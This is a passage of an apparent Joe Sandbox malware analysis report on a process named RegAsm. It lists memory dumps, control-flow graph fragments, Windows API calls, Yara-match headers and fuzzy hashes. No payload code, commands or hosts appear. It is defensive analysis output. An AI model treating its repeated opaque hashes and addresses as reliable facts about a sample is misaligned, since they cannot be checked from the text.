                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 297 22af9f0-22afa05 LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 413c1e-413c1f 1 413c21 0->1 2 413c3f 0->2 3 413c22-413c28 1->3 4 413c41-413c57 2->4 5 413c12 2->5 6 413bd0-413bde 3->6 7 413c2a-413c30 3->7 8 413c58 4->8 5->0 11 413be0-413be7 6->11 12 413bed-413c01 6->12 7->2 9 413c5a 8->9 10 413c8f-413cb1 8->10 13 413cdb-413d1a call 417423 call 404683 call 424a53 9->13 14 413c5c-413c6b 9->14 11->12 12->5 25 413d3a-413d40 13->25 26 413d1c-413d2b PostThreadMessageW 13->26 14->3 19 413c6d-413c6f 14->19 19->8 20 413c71-413c8d 19->20 20->10 26->25 27 413d2d-413d37 26->27 27->25
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2893AGJN$2893AGJN
                                                    • API String ID: 0-3493736453

                                                    Control-flow Graph

                                                    APIs
                                                    • PostThreadMessageW.USER32(2893AGJN,00000111,00000000,00000000), ref: 00413D27
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: 2893AGJN$2893AGJN
                                                    • API String ID: 1836367815-3493736453

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 52 42c4e3-42c524 call 4046d3 call 42d393 RtlFreeHeap
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C51F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: qaA
                                                    • API String ID: 3298025750-3612340373

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 282 42c493-42c4d4 call 4046d3 call 42d393 RtlAllocateHeap
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(?,0041E1AB,?,?,00000000,?,0041E1AB,?,?,?), ref: 0042C4CF
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 292 42c533-42c56f call 4046d3 call 42d393 ExitProcess
                                                    APIs
                                                    • ExitProcess.KERNELBASE(?,00000000,00000000,?,3E31FB11,?,?,3E31FB11), ref: 0042C56A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [Pj
                                                    • API String ID: 0-2289356113
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                    • Instruction ID: 4acb44648d2658455ee2d6d1a0cc5d5c03ee0f15c11f7f8f50accc296515afef
                                                    • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                    • Instruction Fuzzy Hash: DBF0FF2033415AEBCB08EA988DE07AA3396EB94300F64C33CAD49C725CDA619904C690
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                    • Instruction ID: 916eee380caa6acf35b14888c8ee0e8127cb90f91c44c224c28b4c4696c7d7fe
                                                    • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                    • Instruction Fuzzy Hash: 59F05E762502049FCB1CCF04C4F0BB937A6AB80719F14406CE50B8FAD1D7359C42C664
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 94c7fe6625aa850e0663839db7788300cfc63d039aac49aff59b9ac0b8d8de99
                                                    • Instruction ID: f37f1356690c1568edfb994c5b18e054add5b91edb76853e5aadfdda9ea313ea
                                                    • Opcode Fuzzy Hash: 94c7fe6625aa850e0663839db7788300cfc63d039aac49aff59b9ac0b8d8de99
                                                    • Instruction Fuzzy Hash: 97E01A71564B81CFD321DF94D910B1AB3E5FF88B10F15483AE80597B64D7789A05CE52
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                    • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                    • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                    • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                    • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                    • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                    • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                    • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                    • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                    • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                    • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                    • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                    • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2290000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                    • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                    • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                    • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.467204030.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02290000, based on PE: true
                                                    • Associated: 0000000B.00000002.467204030.0000000002290000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002394000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002397000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.00000000023A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.467204030.0000000002400000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
